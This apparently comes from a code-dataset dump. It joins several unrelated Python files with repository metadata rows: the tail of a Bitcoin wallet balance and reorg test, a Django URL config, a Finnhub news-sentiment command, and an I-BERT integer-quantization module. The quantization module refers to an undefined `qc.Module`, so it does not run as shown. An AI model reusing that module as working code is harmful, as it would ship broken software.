assert_equal(self.nodes[1].getbalance(minconf=2), Decimal('0'))
# check mempool transactions count for wallet unconfirmed balance after
# dynamically loading the wallet.
before = self.nodes[1].getunconfirmedbalance()
dst = self.nodes[1].getnewaddress()
self.nodes[1].unloadwallet('')
self.nodes[0].sendtoaddress(dst, 0.1)
self.sync_all()
self.nodes[1].loadwallet('')
after = self.nodes[1].getunconfirmedbalance()
assert_equal(before + Decimal('0.1'), after)
# Create 3 more wallet txs, where the last is not accepted to the
# mempool because it is the third descendant of the tx above
for _ in range(3):
# Set amount high enough such that all coins are spent by each tx
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 99)
self.log.info('Check that wallet txs not in the mempool are untrusted')
assert txid not in self.nodes[0].getrawmempool()
assert_equal(self.nodes[0].gettransaction(txid)['trusted'], False)
assert_equal(self.nodes[0].getbalance(minconf=0), 0)
self.log.info("Test replacement and reorg of non-mempool tx")
tx_orig = self.nodes[0].gettransaction(txid)['hex']
# Increase fee by 1 coin
tx_replace = tx_orig.replace(
struct.pack("<q", 99 * 10**8).hex(),
struct.pack("<q", 98 * 10**8).hex(),
)
tx_replace = self.nodes[0].signrawtransactionwithwallet(tx_replace)['hex']
# Total balance is given by the sum of outputs of the tx
total_amount = sum([o['value'] for o in self.nodes[0].decoderawtransaction(tx_replace)['vout']])
self.sync_all()
self.nodes[1].sendrawtransaction(hexstring=tx_replace, maxfeerate=0)
# Now confirm tx_replace
block_reorg = self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)[0]
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount)
self.log.info('Put txs back into mempool of node 1 (not node 0)')
self.nodes[0].invalidateblock(block_reorg)
self.nodes[1].invalidateblock(block_reorg)
self.sync_blocks()
self.nodes[0].syncwithvalidationinterfacequeue()
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
self.nodes[0].generatetoaddress(1, ADDRESS_WATCHONLY)
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
# Now confirm tx_orig
self.restart_node(1, ['-persistmempool=0'])
connect_nodes(self.nodes[0], 1)
sync_blocks(self.nodes)
self.nodes[1].sendrawtransaction(tx_orig)
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount + 1) # The reorg recovered our fee of 1 coin
if __name__ == '__main__':
WalletTest().main()
| true
| true
|
f719173f8124d167cfa365f834dbc8b7c61362f6
| 247
|
py
|
Python
|
insurance/urls.py
|
paulohenriquesi/origin_python
|
f8f824ccda46a66da93e43bb269803b0d0ee7c99
|
[
"MIT"
] | null | null | null |
insurance/urls.py
|
paulohenriquesi/origin_python
|
f8f824ccda46a66da93e43bb269803b0d0ee7c99
|
[
"MIT"
] | 3
|
2021-03-19T01:18:39.000Z
|
2021-04-08T19:55:26.000Z
|
insurance/urls.py
|
paulohenriquesi/origin_python
|
f8f824ccda46a66da93e43bb269803b0d0ee7c99
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.urls import path, include
from api import views
# URL routing table: Django admin, DRF session-auth endpoints, and the
# risk-calculation view implemented in api.views.calculate_risk.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('api-auth/', include('rest_framework.urls')),
    # NOTE(review): no trailing slash here, unlike the other routes — confirm intentional.
    path('riskcalc', views.calculate_risk)
]
| 24.7
| 54
| 0.716599
|
from django.contrib import admin
from django.urls import path, include
from api import views
urlpatterns = [
path('admin/', admin.site.urls),
path('api-auth/', include('rest_framework.urls')),
path('riskcalc', views.calculate_risk)
]
| true
| true
|
f719184d0965b1afb362f1bed12ae11aa08d5a1a
| 2,600
|
py
|
Python
|
gamestonk_terminal/behavioural_analysis/finnhub_view.py
|
shanedrinion/GamestonkTerminal
|
baf36aa7c96de6918911c7a263cf5ac9648b27e3
|
[
"MIT"
] | 1
|
2021-12-17T19:25:12.000Z
|
2021-12-17T19:25:12.000Z
|
gamestonk_terminal/behavioural_analysis/finnhub_view.py
|
lolrenx/GamestonkTerminal
|
eb2b0d766bf1b6bb8656d6733083962efb152fe2
|
[
"MIT"
] | 1
|
2021-04-20T00:26:20.000Z
|
2021-04-20T00:26:20.000Z
|
gamestonk_terminal/behavioural_analysis/finnhub_view.py
|
lolrenx/GamestonkTerminal
|
eb2b0d766bf1b6bb8656d6733083962efb152fe2
|
[
"MIT"
] | null | null | null |
import argparse
from typing import List, Dict
import requests
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.helper_funcs import (
parse_known_args_and_warn,
)
def get_sentiment_stats(ticker: str) -> Dict:
    """Get sentiment stats

    Parameters
    ----------
    ticker : str
        Ticker to get sentiment stats

    Returns
    -------
    Dict
        Sentiment stats from the Finnhub news-sentiment endpoint, or an
        empty dict when the response status is not 200.
    """
    response = requests.get(
        f"https://finnhub.io/api/v1/news-sentiment?symbol={ticker}&token={cfg.API_FINNHUB_KEY}",
        # Fix: without a timeout this call could hang the terminal forever
        # when the API is unresponsive.
        timeout=10,
    )

    if response.status_code == 200:
        return response.json()

    return {}
def sentiment_stats(other_args: List[str], ticker: str):
    """Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
    bullish vs bearish percentages, sector average bullish percentage, and sector average news score

    Parameters
    ----------
    other_args : List[str]
        Command line arguments to be processed with argparse
    ticker : str
        Ticker to get sentiment stats
    """
    # Parser exists mainly so `-h`/unknown flags behave consistently with
    # the rest of the terminal commands; it takes no options of its own.
    parser = argparse.ArgumentParser(
        add_help=False,
        prog="stats",
        description="""
            Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
            bullish vs bearish percentages, sector average bullish percentage, and sector average news score.
            [Source: https://finnhub.io]
        """,
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return

        d_stats = get_sentiment_stats(ticker)

        # Empty dict means the API call failed or returned non-200.
        if d_stats:
            # Ratio fields are fractions in the API response; scale to percent.
            print(f"Buzz: {round(100*d_stats['buzz']['buzz'],2)} %")
            print(f"News Score: {round(100*d_stats['companyNewsScore'],2)} %")
            print("")
            print(f"Articles Last Week: {d_stats['buzz']['articlesInLastWeek']}")
            print(f"Articles Weekly Average: {d_stats['buzz']['weeklyAverage']}")
            print("")
            print(f"Bullish: {round(100*d_stats['sentiment']['bullishPercent'],2)} %")
            print(f"Bearish: {round(100*d_stats['sentiment']['bearishPercent'],2)} %")
            print("")
            print(
                f"Sector Average Bullish: {round(100*d_stats['sectorAverageBullishPercent'],2)} %"
            )
            print(
                f"Sector Average News Score: {round(100*d_stats['sectorAverageNewsScore'],2)} %"
            )
        else:
            print("No sentiment stats found.")
        print("")

    # Broad catch keeps the interactive terminal alive on any API/parsing error.
    except Exception as e:
        print(e, "\n")
| 31.325301
| 109
| 0.609231
|
import argparse
from typing import List, Dict
import requests
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.helper_funcs import (
parse_known_args_and_warn,
)
def get_sentiment_stats(ticker: str) -> Dict:
response = requests.get(
f"https://finnhub.io/api/v1/news-sentiment?symbol={ticker}&token={cfg.API_FINNHUB_KEY}"
)
if response.status_code == 200:
return response.json()
return {}
def sentiment_stats(other_args: List[str], ticker: str):
parser = argparse.ArgumentParser(
add_help=False,
prog="stats",
description="""
Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
bullish vs bearish percentages, sector average bullish percentage, and sector average news score.
[Source: https://finnhub.io]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
d_stats = get_sentiment_stats(ticker)
if d_stats:
print(f"Buzz: {round(100*d_stats['buzz']['buzz'],2)} %")
print(f"News Score: {round(100*d_stats['companyNewsScore'],2)} %")
print("")
print(f"Articles Last Week: {d_stats['buzz']['articlesInLastWeek']}")
print(f"Articles Weekly Average: {d_stats['buzz']['weeklyAverage']}")
print("")
print(f"Bullish: {round(100*d_stats['sentiment']['bullishPercent'],2)} %")
print(f"Bearish: {round(100*d_stats['sentiment']['bearishPercent'],2)} %")
print("")
print(
f"Sector Average Bullish: {round(100*d_stats['sectorAverageBullishPercent'],2)} %"
)
print(
f"Sector Average News Score: {round(100*d_stats['sectorAverageNewsScore'],2)} %"
)
else:
print("No sentiment stats found.")
print("")
except Exception as e:
print(e, "\n")
| true
| true
|
f71918615f3a215dc0bc915794b798facde5f6a8
| 22,397
|
py
|
Python
|
qnarre/models/ibert_quant_modules.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
qnarre/models/ibert_quant_modules.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
qnarre/models/ibert_quant_modules.py
|
quantapix/qnarre.com
|
f51d5945c20ef8182c4aa11f1b407d064c190c70
|
[
"MIT"
] | null | null | null |
import decimal

import numpy as np
import torch
from torch import nn
from torch.autograd import Function
from torch.nn import functional as F  # F.embedding / F.linear / F.softmax are used below

from ...utils import logging
logger = logging.get_logger(__name__)
class QuantEmbedding(qc.Module):
    """Quantization-aware embedding lookup.

    When `quant_mode` is True the weight matrix is symmetrically quantized
    to `weight_bit` bits before the lookup and the scaling factor is
    returned alongside the result; otherwise it behaves like a plain
    embedding and returns `None` for the scaling factor.
    """

    def __init__(
        self,
        num_embeddings,
        embedding_dim,
        padding_idx=None,
        max_norm=None,
        norm_type=2.0,
        scale_grad_by_freq=False,
        sparse=False,
        _weight=None,
        weight_bit=8,
        momentum=0.95,
        quant_mode=False,
    ):
        super().__init__()
        self.num_ = num_embeddings
        self.dim = embedding_dim
        self.padding_idx = padding_idx
        self.max_norm = max_norm
        self.norm_type = norm_type
        self.scale_grad_by_freq = scale_grad_by_freq
        self.sparse = sparse

        # Full-precision weight plus buffers holding its quantized copy and scale.
        self.weight = nn.Parameter(torch.zeros([num_embeddings, embedding_dim]))
        self.register_buffer("weight_scaling_factor", torch.zeros(1))
        self.register_buffer("weight_integer", torch.zeros_like(self.weight))

        self.weight_bit = weight_bit
        self.momentum = momentum
        self.quant_mode = quant_mode
        self.percentile_mode = False
        self.weight_function = SymmetricQuantFunction.apply

    def forward(self, x, positions=None, incremental_state=None):
        """Look up embeddings for `x`; returns `(embeddings, scaling_factor)`.

        `scaling_factor` is `None` when quantization is disabled.
        """
        if not self.quant_mode:
            # Plain floating-point lookup.
            return (
                F.embedding(
                    x,
                    self.weight,
                    self.padding_idx,
                    self.max_norm,
                    self.norm_type,
                    self.scale_grad_by_freq,
                    self.sparse,
                ),
                None,
            )

        # Derive a single (per-tensor) symmetric scale from the weight range.
        w = self.weight
        w_transform = w.data.detach()
        w_min = w_transform.min().expand(1)
        w_max = w_transform.max().expand(1)

        self.weight_scaling_factor = symmetric_linear_quantization_params(
            self.weight_bit, w_min, w_max, False
        )
        self.weight_integer = self.weight_function(
            self.weight, self.weight_bit, self.percentile_mode, self.weight_scaling_factor
        )

        # Look up in the integer domain, then rescale back to real values.
        emb_int = F.embedding(
            x,
            self.weight_integer,
            self.padding_idx,
            self.max_norm,
            self.norm_type,
            self.scale_grad_by_freq,
            self.sparse,
        )
        return emb_int * self.weight_scaling_factor, self.weight_scaling_factor
class QuantAct(qc.Module):
    """Tracks the running range of an activation and quantizes it.

    During training the observed min/max are accumulated (EMA-smoothed by
    `act_range_momentum`, or a running min/max when the momentum is -1).
    In `quant_mode`, inputs are symmetrically quantized to `activation_bit`
    bits using that range; otherwise the input passes through unchanged.
    """

    def __init__(
        self,
        activation_bit,
        act_range_momentum=0.95,
        per_channel=False,
        channel_len=None,
        quant_mode=False,
    ):
        super().__init__()

        self.activation_bit = activation_bit
        self.act_range_momentum = act_range_momentum
        self.quant_mode = quant_mode
        self.per_channel = per_channel
        self.percentile = False
        self.act_function = SymmetricQuantFunction.apply

        if not self.per_channel:
            self.register_buffer("x_min", torch.zeros(1))
            self.register_buffer("x_max", torch.zeros(1))
            self.register_buffer("act_scaling_factor", torch.zeros(1))
            # Nudge the initial range off exactly zero so the "uninitialized"
            # state is detectable in forward().
            self.x_min -= 1e-5
            self.x_max += 1e-5
        else:
            raise NotImplementedError("per-channel mode is not currently supported for activation.")

    def __repr__(self):
        # Fix: previously interpolated `self.activation_bit` twice; the second
        # field is supposed to show `quant_mode`.
        return (
            f"{self.__class__.__name__}(activation_bit={self.activation_bit}, "
            f"quant_mode: {self.quant_mode}, Act_min: {self.x_min.item():.2f}, "
            f"Act_max: {self.x_max.item():.2f})"
        )

    def forward(
        self,
        x,
        pre_act_scaling_factor=None,
        identity=None,
        identity_scaling_factor=None,
        specified_min=None,
        specified_max=None,
    ):
        """Quantize `x` (plus optional residual `identity`).

        Returns `(quantized_activation, act_scaling_factor)`; the scaling
        factor is `None` when quantization is disabled.
        """
        x_act = x if identity is None else identity + x
        # collect running stats if training
        if self.training:
            assert not self.percentile, "percentile mode is not currently supported for activation."
            assert (
                not self.per_channel
            ), "per-channel mode is not currently supported for activation."
            x_min = x_act.data.min()
            x_max = x_act.data.max()

            assert (
                x_max.isnan().sum() == 0 and x_min.isnan().sum() == 0
            ), "NaN detected when computing min/max of the activation"

            # Initialization
            if self.x_min.min() > -1.1e-5 and self.x_max.max() < 1.1e-5:
                self.x_min = self.x_min + x_min
                self.x_max = self.x_max + x_max

            # exponential moving average (EMA)
            # use momentum to prevent the quantized values change greatly every iteration
            elif self.act_range_momentum == -1:
                self.x_min = torch.min(self.x_min, x_min)
                self.x_max = torch.max(self.x_max, x_max)
            else:
                self.x_min = self.x_min * self.act_range_momentum + x_min * (
                    1 - self.act_range_momentum
                )
                self.x_max = self.x_max * self.act_range_momentum + x_max * (
                    1 - self.act_range_momentum
                )

        if not self.quant_mode:
            return x_act, None

        # Callers may pin the quantization range explicitly.
        x_min = self.x_min if specified_min is None else specified_min
        x_max = self.x_max if specified_max is None else specified_max

        self.act_scaling_factor = symmetric_linear_quantization_params(
            self.activation_bit, x_min, x_max, per_channel=self.per_channel
        )

        if pre_act_scaling_factor is None:
            # this is for the input quantization
            quant_act_int = self.act_function(
                x, self.activation_bit, self.percentile, self.act_scaling_factor
            )
        else:
            # Requantize an already-quantized input (and optional residual)
            # with integer fixed-point arithmetic.
            quant_act_int = FixedPointMul.apply(
                x,
                pre_act_scaling_factor,
                self.activation_bit,
                self.act_scaling_factor,
                identity,
                identity_scaling_factor,
            )

        correct_output_scale = self.act_scaling_factor.view(-1)

        return quant_act_int * correct_output_scale, self.act_scaling_factor
class QuantLinear(qc.Module):
    """Quantization-aware drop-in for a linear layer.

    In `quant_mode`, the weight (and bias, if present) are symmetrically
    quantized to `weight_bit` / `bias_bit` bits and the layer returns
    `(output, bias_scaling_factor)`; otherwise it behaves like a plain
    linear layer and returns `None` for the scaling factor.
    """

    def __init__(
        self,
        in_features,
        out_features,
        bias=True,
        weight_bit=8,
        bias_bit=32,
        per_channel=False,
        quant_mode=False,
    ):
        super().__init__()
        self.in_features = in_features
        self.out_features = out_features

        self.weight = nn.Parameter(torch.zeros([out_features, in_features]))
        self.register_buffer("weight_integer", torch.zeros_like(self.weight))
        self.register_buffer("fc_scaling_factor", torch.zeros(self.out_features))
        if bias:
            self.bias = nn.Parameter(torch.zeros(out_features))
            self.register_buffer("bias_integer", torch.zeros_like(self.bias))
        else:
            # Fix: previously these attributes were simply never set when
            # `bias=False`, so forward() raised AttributeError.
            self.bias = None
            self.bias_integer = None

        self.weight_bit = weight_bit
        self.quant_mode = quant_mode
        self.per_channel = per_channel
        self.bias_bit = bias_bit
        self.quant_mode = quant_mode
        self.percentile_mode = False
        self.weight_function = SymmetricQuantFunction.apply

    def __repr__(self):
        s = super().__repr__()
        s = f"({s} weight_bit={self.weight_bit}, quant_mode={self.quant_mode})"
        return s

    def forward(self, x, prev_act_scaling_factor=None):
        """Apply the (optionally quantized) linear transform to `x`.

        Returns `(output, bias_scaling_factor)`; the scaling factor is
        `None` when quantization is disabled.
        """
        if not self.quant_mode:
            return F.linear(x, weight=self.weight, bias=self.bias), None

        # assert that prev_act_scaling_factor is a scalar tensor
        assert prev_act_scaling_factor is not None and prev_act_scaling_factor.shape == (1,), (
            "Input activation to the QuantLinear layer should be globally (non-channel-wise) quantized. "
            "Please add a QuantAct layer with `per_channel = True` before this QuantAct layer"
        )

        # Per-channel (row-wise) or per-tensor weight range.
        w = self.weight
        w_transform = w.data.detach()
        if self.per_channel:
            w_min, _ = torch.min(w_transform, dim=1, out=None)
            w_max, _ = torch.max(w_transform, dim=1, out=None)
        else:
            w_min = w_transform.min().expand(1)
            w_max = w_transform.max().expand(1)

        self.fc_scaling_factor = symmetric_linear_quantization_params(
            self.weight_bit, w_min, w_max, self.per_channel
        )
        self.weight_integer = self.weight_function(
            self.weight, self.weight_bit, self.percentile_mode, self.fc_scaling_factor
        )

        # The bias scale must equal weight_scale * input_scale so that the
        # integer matmul and bias share one rescaling factor.
        bias_scaling_factor = self.fc_scaling_factor * prev_act_scaling_factor

        if self.bias is not None:
            self.bias_integer = self.weight_function(
                self.bias, self.bias_bit, False, bias_scaling_factor
            )

        prev_act_scaling_factor = prev_act_scaling_factor.view(1, -1)
        x_int = x / prev_act_scaling_factor

        return (
            F.linear(x_int, weight=self.weight_integer, bias=self.bias_integer)
            * bias_scaling_factor,
            bias_scaling_factor,
        )
class IntGELU(qc.Module):
    """Integer-domain GELU.

    erf is approximated by a second-order polynomial a(x+b)**2 + c on
    integer inputs; falls back to `nn.GELU()` when quantization is
    disabled (or forced off via `force_dequant`).
    """

    def __init__(self, quant_mode=True, force_dequant="none"):
        super().__init__()
        self.quant_mode = quant_mode

        if force_dequant in ["nonlinear", "gelu"]:
            logger.info("Force dequantize gelu")
            self.quant_mode = False

        if not self.quant_mode:
            self.activation_fn = nn.GELU()

        self.k = 1.4142  # ~= sqrt(2); divisor of the scale fed to int_erf
        self.const = 14  # dummy integer constant
        self.coeff = [-0.2888, -1.769, 1]  # a(x+b)**2 + c
        # Pre-divide c by a so the polynomial can be evaluated as a * ((x+b)**2 + c/a).
        self.coeff[2] /= self.coeff[0]

    def int_erf(self, x_int, scaling_factor):
        """Polynomial integer approximation of erf; returns (y_int, new_scale)."""
        b_int = torch.floor(self.coeff[1] / scaling_factor)
        c_int = torch.floor(self.coeff[2] / scaling_factor**2)
        sign = torch.sign(x_int)

        # Clamp magnitude at -b_int and restore the sign afterwards.
        abs_int = torch.min(torch.abs(x_int), -b_int)
        y_int = sign * ((abs_int + b_int) ** 2 + c_int)
        scaling_factor = scaling_factor**2 * self.coeff[0]

        # avoid overflow
        y_int = floor_ste.apply(y_int / 2**self.const)
        scaling_factor = scaling_factor * 2**self.const

        return y_int, scaling_factor

    def forward(self, x, scaling_factor=None):
        """Return `(gelu(x), new_scaling_factor)` (`None` scale when not quantized)."""
        if not self.quant_mode:
            return self.activation_fn(x), None

        x_int = x / scaling_factor
        sigmoid_int, sigmoid_scaling_factor = self.int_erf(x_int, scaling_factor / self.k)

        # Integer representation of the "+1" term: x * (erf(.) + 1) / 2.
        shift_int = 1.0 // sigmoid_scaling_factor

        x_int = x_int * (sigmoid_int + shift_int)
        scaling_factor = scaling_factor * sigmoid_scaling_factor / 2

        return x_int * scaling_factor, scaling_factor
class IntSoftmax(qc.Module):
    """Integer-domain softmax.

    exp() is approximated via range reduction (x = r + q * ln(1/2)) plus a
    second-order polynomial for exp(r); the result is renormalized to
    `output_bit` bits. Falls back to `F.softmax` when not in quant mode.
    """

    def __init__(self, output_bit, quant_mode=False, force_dequant="none"):
        super().__init__()
        self.output_bit = output_bit
        self.max_bit = 32
        self.quant_mode = quant_mode

        if force_dequant in ["nonlinear", "softmax"]:
            logger.info("Force dequantize softmax")
            self.quant_mode = False

        # Requantizes the approximated exponentials to 16 bits before summing.
        self.act = QuantAct(16, quant_mode=self.quant_mode)
        self.x0 = -0.6931  # -ln2
        self.const = 30  # dummy integer constant
        self.coef = [0.35815147, 0.96963238, 1.0]  # ax**2 + bx + c
        # Pre-divide b and c by a so the polynomial is a * ((x+b)x + c/a).
        self.coef[1] /= self.coef[0]
        self.coef[2] /= self.coef[0]

    def int_polynomial(self, x_int, scaling_factor):
        """Evaluate the quadratic exp(r) approximation on integers."""
        with torch.no_grad():
            b_int = torch.floor(self.coef[1] / scaling_factor)
            c_int = torch.floor(self.coef[2] / scaling_factor**2)
        z = (x_int + b_int) * x_int + c_int
        scaling_factor = self.coef[0] * scaling_factor**2
        return z, scaling_factor

    def int_exp(self, x_int, scaling_factor):
        """Integer approximation of exp via r + q*(-ln 2) range reduction."""
        with torch.no_grad():
            x0_int = torch.floor(self.x0 / scaling_factor)
        # Clamp at const * (-ln2) — smaller inputs underflow to zero anyway.
        x_int = torch.max(x_int, self.const * x0_int)

        q = floor_ste.apply(x_int / x0_int)
        r = x_int - x0_int * q
        exp_int, exp_scaling_factor = self.int_polynomial(r, scaling_factor)
        # exp(x) = exp(r) * 2**(-q); folded into the 2**const fixed-point shift.
        exp_int = torch.clamp(floor_ste.apply(exp_int * 2 ** (self.const - q)), min=0)
        scaling_factor = exp_scaling_factor / 2**self.const
        return exp_int, scaling_factor

    def forward(self, x, scaling_factor):
        """Return `(softmax(x), new_scaling_factor)` along the last dim."""
        if not self.quant_mode:
            return F.softmax(x, dim=-1), None

        x_int = x / scaling_factor

        # Standard max-subtraction for numerical stability.
        x_int_max, _ = x_int.max(dim=-1, keepdim=True)
        x_int = x_int - x_int_max
        exp_int, exp_scaling_factor = self.int_exp(x_int, scaling_factor)

        # Avoid overflow
        exp, exp_scaling_factor = self.act(exp_int, exp_scaling_factor)
        exp_int = exp / exp_scaling_factor

        exp_int_sum = exp_int.sum(dim=-1, keepdim=True)
        factor = floor_ste.apply(2**self.max_bit / exp_int_sum)
        exp_int = floor_ste.apply(exp_int * factor / 2 ** (self.max_bit - self.output_bit))
        scaling_factor = 1 / 2**self.output_bit
        return exp_int * scaling_factor, scaling_factor
class IntLayerNorm(qc.Module):
    """Integer-domain LayerNorm over the feature axis (axis=2).

    The integer variance accumulation is kept inside `max_bit` (32) bits by
    right-shifting inputs by `shift`, which is grown dynamically during
    training when an overflow is detected.
    """

    def __init__(self, normalized_shape, eps, output_bit=8, quant_mode=False, force_dequant="none"):
        super().__init__()
        self.normalized_shape = normalized_shape
        self.eps = eps

        self.weight = nn.Parameter(torch.zeros(normalized_shape))
        self.bias = nn.Parameter(torch.zeros(normalized_shape))

        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "layernorm"]:
            logger.info("Force dequantize layernorm")
            self.quant_mode = False

        self.register_buffer("shift", torch.zeros(1))
        self.output_bit = output_bit
        self.max_bit = 32
        self.dim_sqrt = None  # lazily initialized sqrt(feature_dim) on first quantized forward
        self.activation = QuantAct(self.output_bit, quant_mode=self.quant_mode)

    def set_shift(self, y_int):
        """Grow `self.shift` so the shifted variance fits in `max_bit` bits."""
        with torch.no_grad():
            y_sq_int = y_int**2
            var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
            shift = (torch.log2(torch.sqrt(var_int / 2**self.max_bit)).ceil()).max()
            shift_old = self.shift
            # Shift only ever grows (monotone), so earlier batches stay valid.
            self.shift = torch.max(self.shift, shift)
            logger.info(f"Dynamic shift adjustment: {int(shift_old)} to {int(self.shift)}")

    def overflow_fallback(self, y_int):
        """Recompute the integer variance after enlarging the shift."""
        self.set_shift(y_int)  # adjusts `self.shift`
        y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
        y_sq_int = y_int_shifted**2
        var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
        return var_int

    def forward(self, x, scaling_factor=None):
        """Return `(layernorm(x), new_scaling_factor)` (`None` scale when not quantized)."""
        if not self.quant_mode:
            mean = x.mean(axis=2, keepdim=True)
            y = x - mean
            var = torch.mean(y**2, axis=2, keepdim=True)
            x = y / torch.sqrt(self.eps + var)
            x = x * self.weight + self.bias
            return x, None

        # compute sqrt of the feature dimension if it is the first run
        if self.dim_sqrt is None:
            n = torch.tensor(x.shape[2], dtype=torch.float)
            self.dim_sqrt = torch.sqrt(n).to(x.device)

        # Normalization: computes mean and variance(std)
        x_int = x / scaling_factor
        mean_int = round_ste.apply(x_int.mean(axis=2, keepdim=True))
        y_int = x_int - mean_int
        y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
        y_sq_int = y_int_shifted**2
        var_int = torch.sum(y_sq_int, axis=2, keepdim=True)

        # overflow handling in training time
        if self.training:
            # if overflow is detected
            if var_int.max() >= 2**self.max_bit:
                var_int = self.overflow_fallback(y_int)
                assert var_int.max() < 2**self.max_bit + 0.1, (
                    "Error detected in overflow handling: "
                    "`var_int` exceeds `self.max_bit` (the maximum possible bit width)"
                )

        # To be replaced with integer-sqrt kernel that produces the same output
        std_int = floor_ste.apply(torch.sqrt(var_int)) * 2**self.shift
        factor = floor_ste.apply(2**31 / std_int)
        y_int = floor_ste.apply(y_int * factor / 2)
        scaling_factor = self.dim_sqrt / 2**30

        # scaling and shifting
        bias = self.bias.data.detach() / (self.weight.data.detach())
        bias_int = floor_ste.apply(bias / scaling_factor)

        y_int = y_int + bias_int
        scaling_factor = scaling_factor * self.weight
        x = y_int * scaling_factor

        return x, scaling_factor
def get_percentile_min_max(input, lower_percentile, upper_percentile, output_tensor=False):
    """Percentile clipping bounds of a 1-D tensor.

    Returns ``(lower_bound, upper_bound)`` where ``upper_bound`` is the value
    at ``upper_percentile`` (in percent) and ``lower_bound`` the value at
    ``lower_percentile`` counted from below.  Python floats are returned
    unless ``output_tensor`` is True.
    """
    n = input.shape[0]
    k_lower = round(n * (1 - lower_percentile * 0.01))
    k_upper = round(n * upper_percentile * 0.01)

    upper = torch.kthvalue(input, k=k_upper).values

    if lower_percentile == 0:
        # Zero lower percentile means "no clipping from below".
        lower = upper * 0
    else:
        # k-th smallest of the negated input == k-th largest of the input.
        lower = -torch.kthvalue(-input, k=k_lower).values

    if output_tensor:
        return lower, upper
    return lower.item(), upper.item()
def linear_quantize(input, scale, zero_point, inplace=False):
    """Affine-quantize *input*: ``round(input / scale + zero_point)``.

    ``scale`` and ``zero_point`` are broadcast per output channel: over the
    first axis for 4-D (conv) and 2-D (linear) inputs, flat otherwise.
    With ``inplace=True`` the input tensor is overwritten and returned.
    """
    ndim = input.dim()
    if ndim == 4:
        broadcast_shape = (-1, 1, 1, 1)
    elif ndim == 2:
        # reshape scale and zeropoint for linear weights
        broadcast_shape = (-1, 1)
    else:
        broadcast_shape = (-1,)
    scale = scale.view(broadcast_shape)
    zero_point = zero_point.view(broadcast_shape)

    # quantized = float / scale + zero_point
    if inplace:
        input.mul_(1.0 / scale).add_(zero_point).round_()
        return input
    return torch.round(1.0 / scale * input + zero_point)
def symmetric_linear_quantization_params(
    num_bits, saturation_min, saturation_max, per_channel=False
):
    """Scale factor(s) for symmetric `num_bits` quantization.

    The scale is ``max(|sat_min|, |sat_max|)`` (per channel when requested),
    floored at 1e-8, divided by the largest positive level ``2**(bits-1)-1``.
    Computed under `no_grad` — the scale is treated as a constant.
    """
    with torch.no_grad():
        levels = 2 ** (num_bits - 1) - 1
        if per_channel:
            bounds = torch.stack([saturation_min.abs(), saturation_max.abs()], dim=1)
            magnitude, _ = torch.max(bounds, dim=1)
        else:
            # builtin max() on two single-element tensors picks the larger one
            magnitude = max(saturation_min.abs(), saturation_max.abs())
        scale = torch.clamp(magnitude, min=1e-8) / levels

    return scale
class SymmetricQuantFunction(Function):
    """Symmetric k-bit quantization with a scale-aware backward pass.

    forward(x, k, percentile_mode, scale) linearly quantizes x into the
    signed k-bit range [-n, n-1]; backward rescales the incoming gradient
    by 1/scale (the other inputs get no gradient).
    """

    @staticmethod
    def forward(ctx, x, k, percentile_mode, scale):
        # Symmetric quantization: the zero point is fixed at 0.
        zero_point = torch.tensor(0.0).to(scale.device)

        n = 2 ** (k - 1) - 1
        new_quant_x = linear_quantize(x, scale, zero_point, inplace=False)
        new_quant_x = torch.clamp(new_quant_x, -n, n - 1)

        ctx.scale = scale
        return new_quant_x

    @staticmethod
    def backward(ctx, grad_output):

        scale = ctx.scale
        if len(grad_output.shape) == 4:
            scale = scale.view(-1, 1, 1, 1)
        # reshape scale and zeropoint for linear weights
        elif len(grad_output.shape) == 2:
            scale = scale.view(-1, 1)
        else:
            scale = scale.view(-1)

        return grad_output.clone() / scale, None, None, None, None
class floor_ste(Function):
    """Floor with a straight-through estimator (identity gradient)."""

    @staticmethod
    def forward(ctx, x):
        # Round toward negative infinity on the forward pass.
        return x.floor()

    @staticmethod
    def backward(ctx, grad_output):
        # Treat floor as the identity when backpropagating.
        return grad_output.clone()
class round_ste(Function):
    """Round-to-nearest with a straight-through estimator (identity gradient)."""

    @staticmethod
    def forward(ctx, x):
        # Nearest-integer rounding on the forward pass.
        return x.round()

    @staticmethod
    def backward(ctx, grad_output):
        # Treat rounding as the identity when backpropagating.
        return grad_output.clone()
def batch_frexp(inputs, max_bit=31):
    """Element-wise fixed-point mantissa/exponent decomposition.

    Each value v is written as ``v ~= m / 2**e`` where the mantissa ``m``
    is an integer scaled by ``2**max_bit``.  Returns ``(mantissa, exponent)``
    tensors with the same shape and device as *inputs*.
    """
    original_shape = inputs.size()
    flat = inputs.view(-1)

    mantissa, exponent = np.frexp(flat.cpu().numpy())

    # Scale mantissas to integers, rounding half away from zero via Decimal.
    quantized = [
        int(
            decimal.Decimal(m * (2**max_bit)).quantize(
                decimal.Decimal("1"), rounding=decimal.ROUND_HALF_UP
            )
        )
        for m in mantissa
    ]
    mantissa = np.array(quantized)
    exponent = float(max_bit) - exponent

    return (
        torch.from_numpy(mantissa).to(inputs.device).view(original_shape),
        torch.from_numpy(exponent).to(inputs.device).view(original_shape),
    )
